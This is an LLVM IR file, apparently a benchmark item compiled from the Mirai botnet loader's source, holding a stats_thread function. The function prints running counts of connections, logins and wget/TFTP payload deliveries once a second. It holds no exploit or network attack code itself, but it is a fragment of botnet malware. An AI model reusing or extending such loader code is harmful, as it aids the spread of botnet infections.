; ModuleID = '/home/carl/AnghaBench/Mirai-Source-Code/loader/src/extr_main.c_stats_thread.c'
source_filename = "/home/carl/AnghaBench/Mirai-Source-Code/loader/src/extr_main.c_stats_thread.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_2__ = type { i32, i32, i32, i32, i32, i32, i32 }

@TRUE = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [79 x i8] c"%ds\09Processed: %d\09Conns: %d\09Logins: %d\09Ran: %d\09Echoes:%d Wgets: %d, TFTPs: %d\0A\00", align 1
@srv = common dso_local global %struct.TYPE_2__* null, align 8
@stdout = common dso_local global i32 0, align 4
@llvm.used = appending global [1 x i8*] [i8* bitcast (i8* (i8*)* @stats_thread to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal i8* @stats_thread(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i8*, align 8
  %4 = alloca i64, align 8
  store i8* %0, i8** %3, align 8
  store i64 0, i64* %4, align 8
  br label %5

5:                                                ; preds = %8, %1
  %6 = load i64, i64* @TRUE, align 8
  %7 = icmp ne i64 %6, 0
  br i1 %7, label %8, label %37

8:                                                ; preds = %5
  %9 = load i64, i64* %4, align 8
  %10 = add nsw i64 %9, 1
  store i64 %10, i64* %4, align 8
  %11 = trunc i64 %9 to i32
  %12 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %13 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %12, i32 0, i32 6
  %14 = call i32 @ATOMIC_GET(i32* %13)
  %15 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %16 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %15, i32 0, i32 5
  %17 = call i32 @ATOMIC_GET(i32* %16)
  %18 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %19 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %18, i32 0, i32 4
  %20 = call i32 @ATOMIC_GET(i32* %19)
  %21 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %22 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %21, i32 0, i32 3
  %23 = call i32 @ATOMIC_GET(i32* %22)
  %24 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %25 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %24, i32 0, i32 2
  %26 = call i32 @ATOMIC_GET(i32* %25)
  %27 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %28 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %27, i32 0, i32 1
  %29 = call i32 @ATOMIC_GET(i32* %28)
  %30 = load %struct.TYPE_2__*, %struct.TYPE_2__** @srv, align 8
  %31 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %30, i32 0, i32 0
  %32 = call i32 @ATOMIC_GET(i32* %31)
  %33 = call i32 @printf(i8* getelementptr inbounds ([79 x i8], [79 x i8]* @.str, i64 0, i64 0), i32 %11, i32 %14, i32 %17, i32 %20, i32 %23, i32 %26, i32 %29, i32 %32)
  %34 = load i32, i32* @stdout, align 4
  %35 = call i32 @fflush(i32 %34)
  %36 = call i32 @sleep(i32 1)
  br label %5

37:                                               ; preds = %5
  %38 = load i8*, i8** %2, align 8
  ret i8* %38
}

declare dso_local i32 @printf(i8*, i32, i32, i32, i32, i32, i32, i32, i32) #1

declare dso_local i32 @ATOMIC_GET(i32*) #1

declare dso_local i32 @fflush(i32) #1

declare dso_local i32 @sleep(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
